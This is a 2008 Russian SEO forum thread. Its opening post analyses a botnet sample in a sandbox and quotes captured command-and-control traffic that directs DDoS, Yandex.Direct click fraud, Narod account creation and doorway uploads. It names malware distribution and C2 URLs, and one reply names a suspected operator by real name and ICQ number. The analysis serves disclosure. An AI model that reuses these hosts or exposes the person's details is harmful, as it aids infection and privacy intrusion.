Надо было найти адреса сайтов с бесплатными гостами, которых ддосят - Самые разные темы

Neosap.ru! спаси РУнет (и попутно Народ и Директ)

kostich · 2008-04-22T23:23:25.0000000Z

При разбирательстве с очередной DDOS атакой к нам подключилось еще больше желающих помочь навести порядок. Будем надеятся, что и Neosap.ru нам не откажет в этой помощи, а заодно и прокомментирует изложенные ниже сведения. В чем смысл SEO? Понаставить ссылок? Понаделать дорвеев? Настоящие SEO должны использовать все методы! В этот час, когда все плохие парни спят после неустанной борьбы с антивирусным ПО, мы хотим поведать очередную историю о жизни одного маленького ботнета. Все ссылки, которые размещены ниже, должны использоваться с максимальной осторожностью, на свой страх и риск! Отправной точкой в этой истории должно быть не место, где раздают злополучный вирус (http://redirtraftospon.com/40/), а неприметный URLик http://stopddos.ru/current/ и письма владельцев зараженных компьютеров, которые обнаружили там свои IP адреса. Но если всё описывать, то до места и конкретной инструкции по спасению РУнета господа из Neosap устанут читать. Если мы все правильно сделаем и не попадемся на уловки для отсечения любопытных, то с http://redirtraftospon.com/40/ нам выпадет замечательнейший файл под названием secret-porn-video.zip. Самое главное в нашем нелегком деле - это скачать его мимо антивирусного ПО, которое противно визжит, и доставить его в какую-то виртуальную среду, где эта гадость не сможет нам причинить вред. Прошу очень внимательно отнестись к использованию "контрацептивов", т.к. при исследовании данных ссылок пострадал уже не один любопытный. Будем надеятся, что после полного реинсталла системы они вернутся в строй. После распаковки и подготовочных к логгированию трафика работ мы можем смело запускать этот файл и участвовать в шоу. Первым, что нас слегка шокирует, будет предложение ввести каптчу. А зачем? Ну да ладно, потом из дампа трафика поймем куда это всё и зачем уходит. После ввода каптчи можно пойти куда-то попить кофе, т.к. данному ПО предстоит нелегкая задача - зарегистрировать аккаунт на Народе, покликать какой-то адалт, скачать сгенерированный дорвей c http://1gost.info/getdor.php, поучавствовать в ДДОС на один строительный сайт, покликать по Яндекс.Директ и покрутить пользователю порнушку. Думаете это всё? Пик кульминации и общий хохот наступает в момент инсталлирования XP Antivirus, который на ваших глазах находит 62 трояна и предлагает их вычистить после введения активационного кода . Однако, эффективная модель продаж у этого XP Antivirus! Ну ничего, у господ из Neosap.ru еще есть возможность подгрузить им таблэтку от Касперского. Модем устал качать, а мы устали ждать... пора уже в нашем Ethereal нажимать на Stop, а в VMware гасить это безобразие и подходить к задаче спасения всея РУнета, Народа и партнеров Директа. Более 30 мегабайтов бардака! Что? Зачем? Почему? Столько знакомых доменов, тематик и надо бы с чего-то начать. Если мы посмотрим на заголовок, то мы конечно же должны понять каким тут боком этот neosap.ru - введем 'ip.dst == 217.16.30.51' в Ethereal и посмотрим что получилось. GET /surf/stat.php?uin= HTTP/1.1 Host: neosap.ru Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) HTTP/1.1 403 Forbidden Date: Tue, 22 Apr 2008 14:47:03 GMT Server: Apache Content-Length: 215 Content-Type: text/html; charset=iso-8859-1 GET /surf/stat.php?uin=19.04.20081564111383201175 HTTP/1.1 Host: neosap.ru Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) HTTP/1.1 403 Forbidden Date: Tue, 22 Apr 2008 14:47:13 GMT Server: Apache Content-Length: 215 Content-Type: text/html; charset=iso-8859-1 "Ах... какая досада" - ответил HTTP сервер neosap.ru. "Вот фигня!" - подумали мы. Ну ничего, мы разберемся зачем оно туда ходит. Покрутившись по дампу мы конечно же заметим нечто похожее, можно даже сказать, байт в байт идентичное, но для ленивых мы предложим ввести "ip.dst == 88.214.202.8" в уже извественое поле ввода. И что мы видим? GET /surf/stat.php?uin= HTTP/1.1 Host: super-tds.info Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) HTTP/1.1 200 OK Date: Tue, 22 Apr 2008 15:00:24 GMT Server: Apache/1.3.39 (Unix) PHP/4.4.8 X-Powered-By: PHP/4.4.8 Connection: close Transfer-Encoding: chunked Content-Type: text/html 2 OK 0 GET /surf/stat.php?uin=19.04.20081564111383201175 HTTP/1.1 Host: super-tds.info Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) HTTP/1.1 200 OK Date: Tue, 22 Apr 2008 15:00:34 GMT Server: Apache/1.3.39 (Unix) PHP/4.4.8 X-Powered-By: PHP/4.4.8 Connection: close Transfer-Encoding: chunked Content-Type: text/html 2 OK 0 GET /surf/updinfo.php HTTP/1.1 Host: super-tds.info Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) HTTP/1.1 200 OK Date: Tue, 22 Apr 2008 15:00:35 GMT Server: Apache/1.3.39 (Unix) PHP/4.4.8 X-Powered-By: PHP/4.4.8 Connection: close Transfer-Encoding: chunked Content-Type: text/html 3d lastver=70 updurl=http://1-ru.com/1233.pdf updsize=325120 0 "Вау! Нас тут знают", - подумали мы и начали изучать дальше. Мы не стали проверять, что конкретно отдает в '/surf/updinfo.php' neosap.ru, т.к. получили ответ отличный от 403 и браузером туда ползти не рискнули. GET /surf/surf.php?version=150 HTTP/1.1 Host: super-tds.info Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) HTTP/1.1 200 OK Date: Tue, 22 Apr 2008 15:00:35 GMT Server: Apache/1.3.39 (Unix) PHP/4.4.8 X-Powered-By: PHP/4.4.8 Connection: close Transfer-Encoding: chunked Content-Type: text/html 10f defpref= queryinterval=5 longqueryinterval=90 url=http://redirtraftospon.com/27/ referer=http://sexo-monster.com/ acceptlanguage=en-us runjava=yes clurl=http://www.yondi.ru/inner_c_article_id_825.phtm clreferer=http://[dsfd[fsdfsdf[.ru/ clinc=an.yandex clexc= 0 Вот мы и нашли указание для ДДОСа на yondi.ru и кликам по Яндекс.Директ. Если мы пороемся дальше, то найдем и указание для регистрации на Народ-е: GET /surf/addacc.php?username=cpwmgv30&password=biyqxmxp&ftppassword=biyqxmxp&host=narod HTTP/1.1 Accept: */* Accept-Language: ru Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: super-tds.info Connection: Keep-Alive HTTP/1.1 302 Found Date: Tue, 22 Apr 2008 15:00:43 GMT Server: Apache/1.3.39 (Unix) PHP/4.4.8 X-Powered-By: PHP/4.4.8 Location: http://1gost.info/getdor.php Connection: close Transfer-Encoding: chunked Content-Type: text/html 0 «И куда это нас в очередной раз послало?» - обратили внимание на 302 ответ. Конечно же, нас вернуло в нашу отправную точку, незаметному http://stopddos.ru/current/ и ДДОСу на ресурс строительной тематики, запросы на который исправно прослеживаются в дампе. Мы можем очень долго анализировать эту грязь, но факт остается фактом кнопка для спасения десятков тысяч «зараженных» пользователей в руках администраторов и программистов neosap.ru. Итак, мы заранее преклоняемся перед нераскрытыми талантами этой команды и просим их помощи. Обычной такой помощи, всего-то надо оповестить этих пользователей, которые так рьяно пытаются добиться от их сервера кода ответа отличного от 403, и помочь им установить какой-то более разумный антивирус, само собой без их ведома. Возможно, обратиться за помощью к сотрудникам антивирусной компании или ДЦ, ну, или к тому, кто всю эту кашу заварил, если таковой имеется в вашем коллективе или присутствует среди партнеров. Если у кого-то не получилось поучаствовать в шоу из-за заметания следов, то ссылочку на душевно упакованную грязь и дампы мы конечно же скинем. А те компьтеры, которые жаждут инструкций от HTTP сервера neosap.ru уже никуда не спрячешь. Давайте это обсудим?

K

223

kostich

23 апреля 2008, 08:13

#11

telo:
Интересную ссылочку про 1gost.ru нарыл
http://www.chemport.ru/guest2/viewtopic.php?p=156124#156124
Рыльце-то в пушку давно...

Продолжаем интригу. А кто билит СМСки для этой крысы?

зы. Интересно, выползет сюда neosap.ru или нет.

проверенная ддос защита (http://ddos-protection.ru) -> http://ddos-protection.ru (http://ddos-protection.ru), бесплатный тест, цена от размера атаки не зависит.

D

46

dqd

23 апреля 2008, 08:18

#12

kostich:
Продолжаем интригу. А кто билит СМСки для этой крысы?

а какой короткий номер?

T

73

telo

23 апреля 2008, 08:19

#13

А биз у них неслабый кстати. 150 рублей за одну смс. Учитывая, что по теме гостов они окупировали всю выдачу через огромную сеть сателлитов.

Стоит того чтобы пару-тройков сайтов, раздающий бесплатно, завалить, а? :)

telo добавил 23.04.2008 в 12:20

dqd, http://1gost.info/fp.php?id=169&dateinstall=25.01.2008&version=1&uid=11111111111111111111

K

223

kostich

23 апреля 2008, 08:22

#14

Тайна http://1gost.info/getdor.php не раскрыта,

как расковырять то, подскажите?

794778 23 апр 12:21 getdor.php
969451 23 апр 12:22 getdor.php.1
879624 23 апр 12:24 getdor.php.10
908782 23 апр 12:24 getdor.php.11
901424 23 апр 12:24 getdor.php.12
736979 23 апр 12:24 getdor.php.13
778881 23 апр 12:24 getdor.php.14
766646 23 апр 12:24 getdor.php.15
771996 23 апр 12:23 getdor.php.2
788855 23 апр 12:23 getdor.php.3
896672 23 апр 12:23 getdor.php.4
948904 23 апр 12:24 getdor.php.5
937312 23 апр 12:24 getdor.php.6
817084 23 апр 12:24 getdor.php.7
816516 23 апр 12:24 getdor.php.8
848690 23 апр 12:24 getdor.php.9

ps. то что это генератор уникальных доров на каждый запрос я уже понял... а кто дальше пропалить сможет?


<BR>files=85<BR>file1=PGh0bWw+DQoNCjxoZWFkPg0KDQoNCjxtZXRhIG5hbWU9IktFWVdPUkRTIi

BDT05URU5UPSLk7urz7OXt8iz04OnrLOTu6vPs5e3yIj4NCg0KDQo8dGl0bGU+8e718ODt6PL8IMPO0d

IgMjgyMC03MyDh+/Hy8O4g8SDg8PXo4uAgICAgIDwvdGl0bGU+DQoNCjwvaGVhZD4NCjxib2R5Pg0KPG

EgaHJlZj1qYWpic3YuaHRtbD8lQzMlQ0UlRDElRDIlMjAyODIwLTczJTI2JUQxJUYyJUYwJUVFJUVEJU

Y2JUU4JUU5JTIwJUUwJUU3JUVFJUYyJUVEJUVFJUVBJUU4JUYxJUVCJUZCJUU5LiUyMCVEMiVFNSVGNS

VFRCVFOCVGNyVFNSVGMSVFQSVFOCVFNSUyMCVGMyVGMSVFQiVFRSVFMiVFOCVGRiUyNjA3LjAyLjIwMD

g+PGZvbnQgc2l6ZT0xMD7x6uD34PL8IMPO0dIgMjgyMC03MyDR8vDu7fbo6SDg5+7y7e7q6PHr++kuIN

Ll9e3o9+Xx6ujlIPPx6+7i6P8g4fvx8vDuIPEg9fDg7ejr6PngPC9mb250PjwvYT4NCiAgIDxmb250IC

AgIGZhY2U9QXJpYWwgTmFycm93IHNpemU9MyBjb2xvcj0jQ0IyNDkxPjxhIGhyZWY9ImdwY294eXdoLm

в чем закодировано?

T

73

telo

23 апреля 2008, 08:31

#15

kostich:
в чем закодировано?

Дык не важно в чем. Без ключа декодировать все равно не получится. А ключ к шифру внутри бота и на сайте, где это генерится. Т.е. бот получает эту галиматью, подставляет ключ и заливает на narod нормальный html.

Прямые заходы ботов на Резкий всплеск прямых заходов. Как работают индексаторы страниц?

K

223

kostich

23 апреля 2008, 08:38

#16

telo:
Дык не важно в чем. Без ключа декодировать все равно не получится. А ключ к шифру внутри бота и на сайте, где это генерится. Т.е. бот получает эту галиматью, подставляет ключ и заливает на narod нормальный html.

шифр подобрали... внутри дор по ГОСТам и куча ссылок вида:


<a href="http://vlwgz.narod.ru/">закачать гост мигом с базы данных</a>

<a href="http://gowrcb.narod.ru/">загрузить документ даром с базы данных</a>

Не, ну закачивайте доры руками, ну слова никто не скажет... зачем из вирей это делать?

ps. я вот чего-то про себя подумал... если бы он в ДДОС и скликивание не ударился бы, то и делал бы себе дальше эти доры... жадность мать её.

262

di_max

23 апреля 2008, 08:49

#17

kostich:
... жадность мать её.

Так только глупость и жадность не имеют предела.;)

// Все наши проблемы от нашего не знания...

T

73

telo

23 апреля 2008, 09:08

#18

di_max:
Так только глупость и жадность не имеют предела.

В данном случае, еще и наглость.

WU

173

WSGU

23 апреля 2008, 09:14

#19

Прошу скинуть адреса в личку, кто знает адреса сайтов с бесплатными гостами которые ддосят, у меня один из ведущих сайтов в этой теме ( с бесплатными гостами). Кто нибудь писал яндексу про их сетку задолбали - в выдачи одни они, и все ведут на их сайт

Яндекс кобласит РКН заблокирует сайт, если Прямые заходы ботов на

K

223

kostich

23 апреля 2008, 09:22

#20

Если внимательно посмотреть на whois doc1.ru, а потом поискать в инете, то можно заметить такую страничку http://mygomel.com/modules.php?name=icq&start=360&all=2069

И там вот есть его ася - 302815403 (Andrey V Klepikov)

ps. Андрей! держи пипку бодрей.

Что делать, если ваша email-рассылка попала в спам

В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи

Neosap.ru! спаси РУнет (и попутно Народ и Директ)